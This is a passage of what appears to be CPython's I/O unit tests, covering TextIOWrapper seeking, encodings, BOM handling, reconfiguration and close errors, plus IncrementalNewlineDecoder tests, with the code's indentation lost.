for size in (0, 1, 2, 3, 4, 5, 30, 31, 32, 33, 62, 63, 64, 65, 1000):
chars = []
for i in range(size):
chars.append(sample[i % len(sample)])
line = "".join(chars) + "\n"
wlines.append((f.tell(), line))
f.write(line)
f.seek(0)
rlines = []
while True:
pos = f.tell()
line = f.readline()
if not line:
break
rlines.append((pos, line))
self.assertEqual(rlines, wlines)
def test_telling(self):
f = self.open(os_helper.TESTFN, "w+", encoding="utf-8")
p0 = f.tell()
f.write("\xff\n")
p1 = f.tell()
f.write("\xff\n")
p2 = f.tell()
f.seek(0)
self.assertEqual(f.tell(), p0)
self.assertEqual(f.readline(), "\xff\n")
self.assertEqual(f.tell(), p1)
self.assertEqual(f.readline(), "\xff\n")
self.assertEqual(f.tell(), p2)
f.seek(0)
for line in f:
self.assertEqual(line, "\xff\n")
self.assertRaises(OSError, f.tell)
self.assertEqual(f.tell(), p2)
f.close()
def test_seeking(self):
chunk_size = _default_chunk_size()
prefix_size = chunk_size - 2
u_prefix = "a" * prefix_size
prefix = bytes(u_prefix.encode("utf-8"))
self.assertEqual(len(u_prefix), len(prefix))
u_suffix = "\u8888\n"
suffix = bytes(u_suffix.encode("utf-8"))
line = prefix + suffix
with self.open(os_helper.TESTFN, "wb") as f:
f.write(line*2)
with self.open(os_helper.TESTFN, "r", encoding="utf-8") as f:
s = f.read(prefix_size)
self.assertEqual(s, str(prefix, "ascii"))
self.assertEqual(f.tell(), prefix_size)
self.assertEqual(f.readline(), u_suffix)
def test_seeking_too(self):
# Regression test for a specific bug
data = b'\xe0\xbf\xbf\n'
with self.open(os_helper.TESTFN, "wb") as f:
f.write(data)
with self.open(os_helper.TESTFN, "r", encoding="utf-8") as f:
f._CHUNK_SIZE # Just test that it exists
f._CHUNK_SIZE = 2
f.readline()
f.tell()
def test_seek_and_tell(self):
#Test seek/tell using the StatefulIncrementalDecoder.
# Make test faster by doing smaller seeks
CHUNK_SIZE = 128
def test_seek_and_tell_with_data(data, min_pos=0):
"""Tell/seek to various points within a data stream and ensure
that the decoded data returned by read() is consistent."""
f = self.open(os_helper.TESTFN, 'wb')
f.write(data)
f.close()
f = self.open(os_helper.TESTFN, encoding='test_decoder')
f._CHUNK_SIZE = CHUNK_SIZE
decoded = f.read()
f.close()
for i in range(min_pos, len(decoded) + 1): # seek positions
for j in [1, 5, len(decoded) - i]: # read lengths
f = self.open(os_helper.TESTFN, encoding='test_decoder')
self.assertEqual(f.read(i), decoded[:i])
cookie = f.tell()
self.assertEqual(f.read(j), decoded[i:i + j])
f.seek(cookie)
self.assertEqual(f.read(), decoded[i:])
f.close()
# Enable the test decoder.
StatefulIncrementalDecoder.codecEnabled = 1
# Run the tests.
try:
# Try each test case.
for input, _, _ in StatefulIncrementalDecoderTest.test_cases:
test_seek_and_tell_with_data(input)
# Position each test case so that it crosses a chunk boundary.
for input, _, _ in StatefulIncrementalDecoderTest.test_cases:
offset = CHUNK_SIZE - len(input)//2
prefix = b'.'*offset
# Don't bother seeking into the prefix (takes too long).
min_pos = offset*2
test_seek_and_tell_with_data(prefix + input, min_pos)
# Ensure our test decoder won't interfere with subsequent tests.
finally:
StatefulIncrementalDecoder.codecEnabled = 0
def test_multibyte_seek_and_tell(self):
f = self.open(os_helper.TESTFN, "w", encoding="euc_jp")
f.write("AB\n\u3046\u3048\n")
f.close()
f = self.open(os_helper.TESTFN, "r", encoding="euc_jp")
self.assertEqual(f.readline(), "AB\n")
p0 = f.tell()
self.assertEqual(f.readline(), "\u3046\u3048\n")
p1 = f.tell()
f.seek(p0)
self.assertEqual(f.readline(), "\u3046\u3048\n")
self.assertEqual(f.tell(), p1)
f.close()
def test_seek_with_encoder_state(self):
f = self.open(os_helper.TESTFN, "w", encoding="euc_jis_2004")
f.write("\u00e6\u0300")
p0 = f.tell()
f.write("\u00e6")
f.seek(p0)
f.write("\u0300")
f.close()
f = self.open(os_helper.TESTFN, "r", encoding="euc_jis_2004")
self.assertEqual(f.readline(), "\u00e6\u0300\u0300")
f.close()
def test_encoded_writes(self):
data = "1234567890"
tests = ("utf-16",
"utf-16-le",
"utf-16-be",
"utf-32",
"utf-32-le",
"utf-32-be")
for encoding in tests:
buf = self.BytesIO()
f = self.TextIOWrapper(buf, encoding=encoding)
# Check if the BOM is written only once (see issue1753).
f.write(data)
f.write(data)
f.seek(0)
self.assertEqual(f.read(), data * 2)
f.seek(0)
self.assertEqual(f.read(), data * 2)
self.assertEqual(buf.getvalue(), (data * 2).encode(encoding))
def test_unreadable(self):
class UnReadable(self.BytesIO):
def readable(self):
return False
txt = self.TextIOWrapper(UnReadable(), encoding="utf-8")
self.assertRaises(OSError, txt.read)
def test_read_one_by_one(self):
txt = self.TextIOWrapper(self.BytesIO(b"AA\r\nBB"), encoding="utf-8")
reads = ""
while True:
c = txt.read(1)
if not c:
break
reads += c
self.assertEqual(reads, "AA\nBB")
def test_readlines(self):
txt = self.TextIOWrapper(self.BytesIO(b"AA\nBB\nCC"), encoding="utf-8")
self.assertEqual(txt.readlines(), ["AA\n", "BB\n", "CC"])
txt.seek(0)
self.assertEqual(txt.readlines(None), ["AA\n", "BB\n", "CC"])
txt.seek(0)
self.assertEqual(txt.readlines(5), ["AA\n", "BB\n"])
# read in amounts equal to TextIOWrapper._CHUNK_SIZE which is 128.
def test_read_by_chunk(self):
# make sure "\r\n" straddles 128 char boundary.
txt = self.TextIOWrapper(self.BytesIO(b"A" * 127 + b"\r\nB"), encoding="utf-8")
reads = ""
while True:
c = txt.read(128)
if not c:
break
reads += c
self.assertEqual(reads, "A"*127+"\nB")
def test_writelines(self):
l = ['ab', 'cd', 'ef']
buf = self.BytesIO()
txt = self.TextIOWrapper(buf, encoding="utf-8")
txt.writelines(l)
txt.flush()
self.assertEqual(buf.getvalue(), b'abcdef')
def test_writelines_userlist(self):
l = UserList(['ab', 'cd', 'ef'])
buf = self.BytesIO()
txt = self.TextIOWrapper(buf, encoding="utf-8")
txt.writelines(l)
txt.flush()
self.assertEqual(buf.getvalue(), b'abcdef')
def test_writelines_error(self):
txt = self.TextIOWrapper(self.BytesIO(), encoding="utf-8")
self.assertRaises(TypeError, txt.writelines, [1, 2, 3])
self.assertRaises(TypeError, txt.writelines, None)
self.assertRaises(TypeError, txt.writelines, b'abc')
def test_issue1395_1(self):
txt = self.TextIOWrapper(self.BytesIO(self.testdata), encoding="ascii")
# read one char at a time
reads = ""
while True:
c = txt.read(1)
if not c:
break
reads += c
self.assertEqual(reads, self.normalized)
def test_issue1395_2(self):
txt = self.TextIOWrapper(self.BytesIO(self.testdata), encoding="ascii")
txt._CHUNK_SIZE = 4
reads = ""
while True:
c = txt.read(4)
if not c:
break
reads += c
self.assertEqual(reads, self.normalized)
def test_issue1395_3(self):
txt = self.TextIOWrapper(self.BytesIO(self.testdata), encoding="ascii")
txt._CHUNK_SIZE = 4
reads = txt.read(4)
reads += txt.read(4)
reads += txt.readline()
reads += txt.readline()
reads += txt.readline()
self.assertEqual(reads, self.normalized)
def test_issue1395_4(self):
txt = self.TextIOWrapper(self.BytesIO(self.testdata), encoding="ascii")
txt._CHUNK_SIZE = 4
reads = txt.read(4)
reads += txt.read()
self.assertEqual(reads, self.normalized)
def test_issue1395_5(self):
txt = self.TextIOWrapper(self.BytesIO(self.testdata), encoding="ascii")
txt._CHUNK_SIZE = 4
reads = txt.read(4)
pos = txt.tell()
txt.seek(0)
txt.seek(pos)
self.assertEqual(txt.read(4), "BBB\n")
def test_issue2282(self):
buffer = self.BytesIO(self.testdata)
txt = self.TextIOWrapper(buffer, encoding="ascii")
self.assertEqual(buffer.seekable(), txt.seekable())
def test_append_bom(self):
# The BOM is not written again when appending to a non-empty file
filename = os_helper.TESTFN
for charset in ('utf-8-sig', 'utf-16', 'utf-32'):
with self.open(filename, 'w', encoding=charset) as f:
f.write('aaa')
pos = f.tell()
with self.open(filename, 'rb') as f:
self.assertEqual(f.read(), 'aaa'.encode(charset))
with self.open(filename, 'a', encoding=charset) as f:
f.write('xxx')
with self.open(filename, 'rb') as f:
self.assertEqual(f.read(), 'aaaxxx'.encode(charset))
def test_seek_bom(self):
# Same test, but when seeking manually
filename = os_helper.TESTFN
for charset in ('utf-8-sig', 'utf-16', 'utf-32'):
with self.open(filename, 'w', encoding=charset) as f:
f.write('aaa')
pos = f.tell()
with self.open(filename, 'r+', encoding=charset) as f:
f.seek(pos)
f.write('zzz')
f.seek(0)
f.write('bbb')
with self.open(filename, 'rb') as f:
self.assertEqual(f.read(), 'bbbzzz'.encode(charset))
def test_seek_append_bom(self):
# Same test, but first seek to the start and then to the end
filename = os_helper.TESTFN
for charset in ('utf-8-sig', 'utf-16', 'utf-32'):
with self.open(filename, 'w', encoding=charset) as f:
f.write('aaa')
with self.open(filename, 'a', encoding=charset) as f:
f.seek(0)
f.seek(0, self.SEEK_END)
f.write('xxx')
with self.open(filename, 'rb') as f:
self.assertEqual(f.read(), 'aaaxxx'.encode(charset))
def test_errors_property(self):
with self.open(os_helper.TESTFN, "w", encoding="utf-8") as f:
self.assertEqual(f.errors, "strict")
with self.open(os_helper.TESTFN, "w", encoding="utf-8", errors="replace") as f:
self.assertEqual(f.errors, "replace")
@support.no_tracing
@threading_helper.requires_working_threading()
def test_threads_write(self):
# Issue6750: concurrent writes could duplicate data
event = threading.Event()
with self.open(os_helper.TESTFN, "w", encoding="utf-8", buffering=1) as f:
def run(n):
text = "Thread%03d\n" % n
event.wait()
f.write(text)
threads = [threading.Thread(target=run, args=(x,))
for x in range(20)]
with threading_helper.start_threads(threads, event.set):
time.sleep(0.02)
with self.open(os_helper.TESTFN, encoding="utf-8") as f:
content = f.read()
for n in range(20):
self.assertEqual(content.count("Thread%03d\n" % n), 1)
def test_flush_error_on_close(self):
# Test that text file is closed despite failed flush
# and that flush() is called before file closed.
txt = self.TextIOWrapper(self.BytesIO(self.testdata), encoding="ascii")
closed = []
def bad_flush():
closed[:] = [txt.closed, txt.buffer.closed]
raise OSError()
txt.flush = bad_flush
self.assertRaises(OSError, txt.close) # exception not swallowed
self.assertTrue(txt.closed)
self.assertTrue(txt.buffer.closed)
self.assertTrue(closed) # flush() called
self.assertFalse(closed[0]) # flush() called before file closed
self.assertFalse(closed[1])
txt.flush = lambda: None # break reference loop
def test_close_error_on_close(self):
buffer = self.BytesIO(self.testdata)
def bad_flush():
raise OSError('flush')
def bad_close():
raise OSError('close')
buffer.close = bad_close
txt = self.TextIOWrapper(buffer, encoding="ascii")
txt.flush = bad_flush
with self.assertRaises(OSError) as err: # exception not swallowed
txt.close()
self.assertEqual(err.exception.args, ('close',))
self.assertIsInstance(err.exception.__context__, OSError)
self.assertEqual(err.exception.__context__.args, ('flush',))
self.assertFalse(txt.closed)
# Silence destructor error
buffer.close = lambda: None
txt.flush = lambda: None
def test_nonnormalized_close_error_on_close(self):
# Issue #21677
buffer = self.BytesIO(self.testdata)
def bad_flush():
raise non_existing_flush
def bad_close():
raise non_existing_close
buffer.close = bad_close
txt = self.TextIOWrapper(buffer, encoding="ascii")
txt.flush = bad_flush
with self.assertRaises(NameError) as err: # exception not swallowed
txt.close()
self.assertIn('non_existing_close', str(err.exception))
self.assertIsInstance(err.exception.__context__, NameError)
self.assertIn('non_existing_flush', str(err.exception.__context__))
self.assertFalse(txt.closed)
# Silence destructor error
buffer.close = lambda: None
txt.flush = lambda: None
def test_multi_close(self):
txt = self.TextIOWrapper(self.BytesIO(self.testdata), encoding="ascii")
txt.close()
txt.close()
txt.close()
self.assertRaises(ValueError, txt.flush)
def test_unseekable(self):
txt = self.TextIOWrapper(self.MockUnseekableIO(self.testdata), encoding="utf-8")
self.assertRaises(self.UnsupportedOperation, txt.tell)
self.assertRaises(self.UnsupportedOperation, txt.seek, 0)
def test_readonly_attributes(self):
txt = self.TextIOWrapper(self.BytesIO(self.testdata), encoding="ascii")
buf = self.BytesIO(self.testdata)
with self.assertRaises(AttributeError):
txt.buffer = buf
def test_rawio(self):
# Issue #12591: TextIOWrapper must work with raw I/O objects, so
# that subprocess.Popen() can have the required unbuffered
# semantics with universal_newlines=True.
raw = self.MockRawIO([b'abc', b'def', b'ghi\njkl\nopq\n'])
txt = self.TextIOWrapper(raw, encoding='ascii', newline='\n')
# Reads
self.assertEqual(txt.read(4), 'abcd')
self.assertEqual(txt.readline(), 'efghi\n')
self.assertEqual(list(txt), ['jkl\n', 'opq\n'])
def test_rawio_write_through(self):
# Issue #12591: with write_through=True, writes don't need a flush
raw = self.MockRawIO([b'abc', b'def', b'ghi\njkl\nopq\n'])
txt = self.TextIOWrapper(raw, encoding='ascii', newline='\n',
write_through=True)
txt.write('1')
txt.write('23\n4')
txt.write('5')
self.assertEqual(b''.join(raw._write_stack), b'123\n45')
def test_bufio_write_through(self):
# Issue #21396: write_through=True doesn't force a flush()
# on the underlying binary buffered object.
flush_called, write_called = [], []
class BufferedWriter(self.BufferedWriter):
def flush(self, *args, **kwargs):
flush_called.append(True)
return super().flush(*args, **kwargs)
def write(self, *args, **kwargs):
write_called.append(True)
return super().write(*args, **kwargs)
rawio = self.BytesIO()
data = b"a"
bufio = BufferedWriter(rawio, len(data)*2)
textio = self.TextIOWrapper(bufio, encoding='ascii',
write_through=True)
# write to the buffered io but don't overflow the buffer
text = data.decode('ascii')
textio.write(text)
# buffer.flush is not called with write_through=True
self.assertFalse(flush_called)
# buffer.write *is* called with write_through=True
self.assertTrue(write_called)
self.assertEqual(rawio.getvalue(), b"") # no flush
write_called = [] # reset
textio.write(text * 10) # total content is larger than bufio buffer
self.assertTrue(write_called)
self.assertEqual(rawio.getvalue(), data * 11) # all flushed
def test_reconfigure_write_through(self):
raw = self.MockRawIO([])
t = self.TextIOWrapper(raw, encoding='ascii', newline='\n')
t.write('1')
t.reconfigure(write_through=True) # implied flush
self.assertEqual(t.write_through, True)
self.assertEqual(b''.join(raw._write_stack), b'1')
t.write('23')
self.assertEqual(b''.join(raw._write_stack), b'123')
t.reconfigure(write_through=False)
self.assertEqual(t.write_through, False)
t.write('45')
t.flush()
self.assertEqual(b''.join(raw._write_stack), b'12345')
# Keeping default value
t.reconfigure()
t.reconfigure(write_through=None)
self.assertEqual(t.write_through, False)
t.reconfigure(write_through=True)
t.reconfigure()
t.reconfigure(write_through=None)
self.assertEqual(t.write_through, True)
def test_read_nonbytes(self):
# Issue #17106
# Crash when underlying read() returns non-bytes
t = self.TextIOWrapper(self.StringIO('a'), encoding="utf-8")
self.assertRaises(TypeError, t.read, 1)
t = self.TextIOWrapper(self.StringIO('a'), encoding="utf-8")
self.assertRaises(TypeError, t.readline)
t = self.TextIOWrapper(self.StringIO('a'), encoding="utf-8")
self.assertRaises(TypeError, t.read)
def test_illegal_encoder(self):
# Issue 31271: Calling write() while the return value of encoder's
# encode() is invalid shouldn't cause an assertion failure.
rot13 = codecs.lookup("rot13")
with support.swap_attr(rot13, '_is_text_encoding', True):
t = io.TextIOWrapper(io.BytesIO(b'foo'), encoding="rot13")
self.assertRaises(TypeError, t.write, 'bar')
def test_illegal_decoder(self):
# Issue #17106
# Bypass the early encoding check added in issue 20404
def _make_illegal_wrapper():
quopri = codecs.lookup("quopri")
quopri._is_text_encoding = True
try:
t = self.TextIOWrapper(self.BytesIO(b'aaaaaa'),
newline='\n', encoding="quopri")
finally:
quopri._is_text_encoding = False
return t
# Crash when decoder returns non-string
t = _make_illegal_wrapper()
self.assertRaises(TypeError, t.read, 1)
t = _make_illegal_wrapper()
self.assertRaises(TypeError, t.readline)
t = _make_illegal_wrapper()
self.assertRaises(TypeError, t.read)
# Issue 31243: calling read() while the return value of decoder's
# getstate() is invalid should neither crash the interpreter nor
# raise a SystemError.
def _make_very_illegal_wrapper(getstate_ret_val):
class BadDecoder:
def getstate(self):
return getstate_ret_val
def _get_bad_decoder(dummy):
return BadDecoder()
quopri = codecs.lookup("quopri")
with support.swap_attr(quopri, 'incrementaldecoder',
_get_bad_decoder):
return _make_illegal_wrapper()
t = _make_very_illegal_wrapper(42)
self.assertRaises(TypeError, t.read, 42)
t = _make_very_illegal_wrapper(())
self.assertRaises(TypeError, t.read, 42)
t = _make_very_illegal_wrapper((1, 2))
self.assertRaises(TypeError, t.read, 42)
def _check_create_at_shutdown(self, **kwargs):
# Issue #20037: creating a TextIOWrapper at shutdown
# shouldn't crash the interpreter.
iomod = self.io.__name__
code = """if 1:
import codecs
import {iomod} as io
# Avoid looking up codecs at shutdown
codecs.lookup('utf-8')
class C:
def __init__(self):
self.buf = io.BytesIO()
def __del__(self):
io.TextIOWrapper(self.buf, **{kwargs})
print("ok")
c = C()
""".format(iomod=iomod, kwargs=kwargs)
return assert_python_ok("-c", code)
def test_create_at_shutdown_without_encoding(self):
rc, out, err = self._check_create_at_shutdown()
if err:
# Can error out with a RuntimeError if the module state
# isn't found.
self.assertIn(self.shutdown_error, err.decode())
else:
self.assertEqual("ok", out.decode().strip())
def test_create_at_shutdown_with_encoding(self):
rc, out, err = self._check_create_at_shutdown(encoding='utf-8',
errors='strict')
self.assertFalse(err)
self.assertEqual("ok", out.decode().strip())
def test_read_byteslike(self):
r = MemviewBytesIO(b'Just some random string\n')
t = self.TextIOWrapper(r, 'utf-8')
# TextIOwrapper will not read the full string, because
# we truncate it to a multiple of the native int size
# so that we can construct a more complex memoryview.
bytes_val = _to_memoryview(r.getvalue()).tobytes()
self.assertEqual(t.read(200), bytes_val.decode('utf-8'))
def test_issue22849(self):
class F(object):
def readable(self): return True
def writable(self): return True
def seekable(self): return True
for i in range(10):
try:
self.TextIOWrapper(F(), encoding='utf-8')
except Exception:
pass
F.tell = lambda x: 0
t = self.TextIOWrapper(F(), encoding='utf-8')
def test_reconfigure_encoding_read(self):
# latin1 -> utf8
# (latin1 can decode utf-8 encoded string)
data = 'abc\xe9\n'.encode('latin1') + 'd\xe9f\n'.encode('utf8')
raw = self.BytesIO(data)
txt = self.TextIOWrapper(raw, encoding='latin1', newline='\n')
self.assertEqual(txt.readline(), 'abc\xe9\n')
with self.assertRaises(self.UnsupportedOperation):
txt.reconfigure(encoding='utf-8')
with self.assertRaises(self.UnsupportedOperation):
txt.reconfigure(newline=None)
def test_reconfigure_write_fromascii(self):
# ascii has a specific encodefunc in the C implementation,
# but utf-8-sig has not. Make sure that we get rid of the
# cached encodefunc when we switch encoders.
raw = self.BytesIO()
txt = self.TextIOWrapper(raw, encoding='ascii', newline='\n')
txt.write('foo\n')
txt.reconfigure(encoding='utf-8-sig')
txt.write('\xe9\n')
txt.flush()
self.assertEqual(raw.getvalue(), b'foo\n\xc3\xa9\n')
def test_reconfigure_write(self):
# latin -> utf8
raw = self.BytesIO()
txt = self.TextIOWrapper(raw, encoding='latin1', newline='\n')
txt.write('abc\xe9\n')
txt.reconfigure(encoding='utf-8')
self.assertEqual(raw.getvalue(), b'abc\xe9\n')
txt.write('d\xe9f\n')
txt.flush()
self.assertEqual(raw.getvalue(), b'abc\xe9\nd\xc3\xa9f\n')
# ascii -> utf-8-sig: ensure that no BOM is written in the middle of
# the file
raw = self.BytesIO()
txt = self.TextIOWrapper(raw, encoding='ascii', newline='\n')
txt.write('abc\n')
txt.reconfigure(encoding='utf-8-sig')
txt.write('d\xe9f\n')
txt.flush()
self.assertEqual(raw.getvalue(), b'abc\nd\xc3\xa9f\n')
def test_reconfigure_write_non_seekable(self):
raw = self.BytesIO()
raw.seekable = lambda: False
raw.seek = None
txt = self.TextIOWrapper(raw, encoding='ascii', newline='\n')
txt.write('abc\n')
txt.reconfigure(encoding='utf-8-sig')
txt.write('d\xe9f\n')
txt.flush()
# If the raw stream is not seekable, there'll be a BOM
self.assertEqual(raw.getvalue(), b'abc\n\xef\xbb\xbfd\xc3\xa9f\n')
def test_reconfigure_defaults(self):
txt = self.TextIOWrapper(self.BytesIO(), 'ascii', 'replace', '\n')
txt.reconfigure(encoding=None)
self.assertEqual(txt.encoding, 'ascii')
self.assertEqual(txt.errors, 'replace')
txt.write('LF\n')
txt.reconfigure(newline='\r\n')
self.assertEqual(txt.encoding, 'ascii')
self.assertEqual(txt.errors, 'replace')
txt.reconfigure(errors='ignore')
self.assertEqual(txt.encoding, 'ascii')
self.assertEqual(txt.errors, 'ignore')
txt.write('CRLF\n')
txt.reconfigure(encoding='utf-8', newline=None)
self.assertEqual(txt.errors, 'strict')
txt.seek(0)
self.assertEqual(txt.read(), 'LF\nCRLF\n')
self.assertEqual(txt.detach().getvalue(), b'LF\nCRLF\r\n')
def test_reconfigure_newline(self):
raw = self.BytesIO(b'CR\rEOF')
txt = self.TextIOWrapper(raw, 'ascii', newline='\n')
txt.reconfigure(newline=None)
self.assertEqual(txt.readline(), 'CR\n')
raw = self.BytesIO(b'CR\rEOF')
txt = self.TextIOWrapper(raw, 'ascii', newline='\n')
txt.reconfigure(newline='')
self.assertEqual(txt.readline(), 'CR\r')
raw = self.BytesIO(b'CR\rLF\nEOF')
txt = self.TextIOWrapper(raw, 'ascii', newline='\r')
txt.reconfigure(newline='\n')
self.assertEqual(txt.readline(), 'CR\rLF\n')
raw = self.BytesIO(b'LF\nCR\rEOF')
txt = self.TextIOWrapper(raw, 'ascii', newline='\n')
txt.reconfigure(newline='\r')
self.assertEqual(txt.readline(), 'LF\nCR\r')
raw = self.BytesIO(b'CR\rCRLF\r\nEOF')
txt = self.TextIOWrapper(raw, 'ascii', newline='\r')
txt.reconfigure(newline='\r\n')
self.assertEqual(txt.readline(), 'CR\rCRLF\r\n')
txt = self.TextIOWrapper(self.BytesIO(), 'ascii', newline='\r')
txt.reconfigure(newline=None)
txt.write('linesep\n')
txt.reconfigure(newline='')
txt.write('LF\n')
txt.reconfigure(newline='\n')
txt.write('LF\n')
txt.reconfigure(newline='\r')
txt.write('CR\n')
txt.reconfigure(newline='\r\n')
txt.write('CRLF\n')
expected = 'linesep' + os.linesep + 'LF\nLF\nCR\rCRLF\r\n'
self.assertEqual(txt.detach().getvalue().decode('ascii'), expected)
def test_issue25862(self):
# Assertion failures occurred in tell() after read() and write().
t = self.TextIOWrapper(self.BytesIO(b'test'), encoding='ascii')
t.read(1)
t.read()
t.tell()
t = self.TextIOWrapper(self.BytesIO(b'test'), encoding='ascii')
t.read(1)
t.write('x')
t.tell()
class MemviewBytesIO(io.BytesIO):
'''A BytesIO object whose read method returns memoryviews
rather than bytes'''
def read1(self, len_):
return _to_memoryview(super().read1(len_))
def read(self, len_):
return _to_memoryview(super().read(len_))
def _to_memoryview(buf):
'''Convert bytes-object *buf* to a non-trivial memoryview'''
arr = array.array('i')
idx = len(buf) - len(buf) % arr.itemsize
arr.frombytes(buf[:idx])
return memoryview(arr)
class CTextIOWrapperTest(TextIOWrapperTest):
io = io
shutdown_error = "LookupError: unknown encoding: ascii"
def test_initialization(self):
r = self.BytesIO(b"\xc3\xa9\n\n")
b = self.BufferedReader(r, 1000)
t = self.TextIOWrapper(b, encoding="utf-8")
self.assertRaises(ValueError, t.__init__, b, encoding="utf-8", newline='xyzzy')
self.assertRaises(ValueError, t.read)
t = self.TextIOWrapper.__new__(self.TextIOWrapper)
self.assertRaises(Exception, repr, t)
def test_garbage_collection(self):
# C TextIOWrapper objects are collected, and collecting them flushes
# all data to disk.
# The Python version has __del__, so it ends in gc.garbage instead.
with warnings_helper.check_warnings(('', ResourceWarning)):
rawio = io.FileIO(os_helper.TESTFN, "wb")
b = self.BufferedWriter(rawio)
t = self.TextIOWrapper(b, encoding="ascii")
t.write("456def")
t.x = t
wr = weakref.ref(t)
del t
support.gc_collect()
self.assertIsNone(wr(), wr)
with self.open(os_helper.TESTFN, "rb") as f:
self.assertEqual(f.read(), b"456def")
def test_rwpair_cleared_before_textio(self):
# Issue 13070: TextIOWrapper's finalization would crash when called
# after the reference to the underlying BufferedRWPair's writer got
# cleared by the GC.
for i in range(1000):
b1 = self.BufferedRWPair(self.MockRawIO(), self.MockRawIO())
t1 = self.TextIOWrapper(b1, encoding="ascii")
b2 = self.BufferedRWPair(self.MockRawIO(), self.MockRawIO())
t2 = self.TextIOWrapper(b2, encoding="ascii")
# circular references
t1.buddy = t2
t2.buddy = t1
support.gc_collect()
def test_del__CHUNK_SIZE_SystemError(self):
t = self.TextIOWrapper(self.BytesIO(), encoding='ascii')
with self.assertRaises(AttributeError):
del t._CHUNK_SIZE
def test_internal_buffer_size(self):
# bpo-43260: TextIOWrapper's internal buffer should not store
# data larger than chunk size.
chunk_size = 8192 # default chunk size, updated later
class MockIO(self.MockRawIO):
def write(self, data):
if len(data) > chunk_size:
raise RuntimeError
return super().write(data)
buf = MockIO()
t = self.TextIOWrapper(buf, encoding="ascii")
chunk_size = t._CHUNK_SIZE
t.write("abc")
t.write("def")
# default chunk size is 8192 bytes so t don't write data to buf.
self.assertEqual([], buf._write_stack)
with self.assertRaises(RuntimeError):
t.write("x"*(chunk_size+1))
self.assertEqual([b"abcdef"], buf._write_stack)
t.write("ghi")
t.write("x"*chunk_size)
self.assertEqual([b"abcdef", b"ghi", b"x"*chunk_size], buf._write_stack)
class PyTextIOWrapperTest(TextIOWrapperTest):
io = pyio
shutdown_error = "LookupError: unknown encoding: ascii"
class IncrementalNewlineDecoderTest(unittest.TestCase):
def check_newline_decoding_utf8(self, decoder):
# UTF-8 specific tests for a newline decoder
def _check_decode(b, s, **kwargs):
# We exercise getstate() / setstate() as well as decode()
state = decoder.getstate()
self.assertEqual(decoder.decode(b, **kwargs), s)
decoder.setstate(state)
self.assertEqual(decoder.decode(b, **kwargs), s)
_check_decode(b'\xe8\xa2\x88', "\u8888")
_check_decode(b'\xe8', "")
_check_decode(b'\xa2', "")
_check_decode(b'\x88', "\u8888")
_check_decode(b'\xe8', "")
_check_decode(b'\xa2', "")
_check_decode(b'\x88', "\u8888")
_check_decode(b'\xe8', "")
self.assertRaises(UnicodeDecodeError, decoder.decode, b'', final=True)
decoder.reset()
_check_decode(b'\n', "\n")
_check_decode(b'\r', "")
_check_decode(b'', "\n", final=True)
_check_decode(b'\r', "\n", final=True)
_check_decode(b'\r', "")
_check_decode(b'a', "\na")
_check_decode(b'\r\r\n', "\n\n")
_check_decode(b'\r', "")
_check_decode(b'\r', "\n")
_check_decode(b'\na', "\na")
_check_decode(b'\xe8\xa2\x88\r\n', "\u8888\n")
_check_decode(b'\xe8\xa2\x88', "\u8888")
_check_decode(b'\n', "\n")
_check_decode(b'\xe8\xa2\x88\r', "\u8888")
_check_decode(b'\n', "\n")
def check_newline_decoding(self, decoder, encoding):
result = []
if encoding is not None:
encoder = codecs.getincrementalencoder(encoding)()
def _decode_bytewise(s):
# Decode one byte at a time
for b in encoder.encode(s):
result.append(decoder.decode(bytes([b])))
else:
encoder = None
def _decode_bytewise(s):
# Decode one char at a time
for c in s:
result.append(decoder.decode(c))
self.assertEqual(decoder.newlines, None)
_decode_bytewise("abc\n\r")
self.assertEqual(decoder.newlines, '\n')
_decode_bytewise("\nabc")
self.assertEqual(decoder.newlines, ('\n', '\r\n'))
_decode_bytewise("abc\r")
self.assertEqual(decoder.newlines, ('\n', '\r\n'))
_decode_bytewise("abc")
self.assertEqual(decoder.newlines, ('\r', '\n', '\r\n'))
_decode_bytewise("abc\r")
self.assertEqual("".join(result), "abc\n\nabcabc\nabcabc")
decoder.reset()
input = "abc"
if encoder is not None:
encoder.reset()
input = encoder.encode(input)
self.assertEqual(decoder.decode(input), "abc")
self.assertEqual(decoder.newlines, None)
def test_newline_decoder(self):
encodings = (
# None meaning the IncrementalNewlineDecoder takes unicode input
# rather than bytes input
None, 'utf-8', 'latin-1',
'utf-16', 'utf-16-le', 'utf-16-be',
'utf-32', 'utf-32-le', 'utf-32-be',
)
for enc in encodings:
decoder = enc and codecs.getincrementaldecoder(enc)()
decoder = self.IncrementalNewlineDecoder(decoder, translate=True)
self.check_newline_decoding(decoder, enc)
decoder = codecs.getincrementaldecoder("utf-8")()
decoder = self.IncrementalNewlineDecoder(decoder, translate=True)
self.check_newline_decoding_utf8(decoder)
self.assertRaises(TypeError, decoder.setstate, 42)
def test_newline_bytes(self):
# Issue 5433: Excessive optimization in IncrementalNewlineDecoder
def _check(dec):
self.assertEqual(dec.newlines, None)
self.assertEqual(dec.decode("\u0D00"), "\u0D00")
self.assertEqual(dec.newlines, None)
self.assertEqual(dec.decode("\u0A00"), "\u0A00")
self.assertEqual(dec.newlines, None)
dec = self.IncrementalNewlineDecoder(None, translate=False)
_check(dec)
dec = self.IncrementalNewlineDecoder(None, translate=True)
_check(dec)
def test_translate(self):
# issue 35062
for translate in (-2, -1, 1, 2):
decoder = codecs.getincrementaldecoder("utf-8")()
decoder = self.IncrementalNewlineDecoder(decoder, translate)
self.check_newline_decoding_utf8(decoder)
decoder = codecs.getincrementaldecoder("utf-8")()
decoder = self.IncrementalNewlineDecoder(decoder, translate=0)
self.assertEqual(decoder.decode(b"\r\r\n"), "\r\r\n")
class CIncrementalNewlineDecoderTest(IncrementalNewlineDecoderTest):
pass
class PyIncrementalNewlineDecoderTest(IncrementalNewlineDecoderTest):
pass
# XXX Tests for open()
class MiscIOTest(unittest.TestCase):
def tearDown(self):
os_helper.unlink(os_helper.TESTFN)
def test___all__(self):
for name in self.io.__all__:
obj = getattr(self.io, name, None)
self.assertIsNotNone(obj, name)
if name in ("open", "open_code"):
continue
elif "error" in name.lower() or name == "UnsupportedOperation":
self.assertTrue(issubclass(obj, Exception), name)
elif not name.startswith("SEEK_"):
self.assertTrue(issubclass(obj, self.IOBase))
def test_attributes(self):
f = self.open(os_helper.TESTFN, "wb", buffering=0)
self.assertEqual(f.mode, "wb")
f.close()
f = self.open(os_helper.TESTFN, "w+", encoding="utf-8")
self.assertEqual(f.mode, "w+")
self.assertEqual(f.buffer.mode, "rb+") # Does it really matter?
self.assertEqual(f.buffer.raw.mode, "rb+")
g = self.open(f.fileno(), "wb", closefd=False)
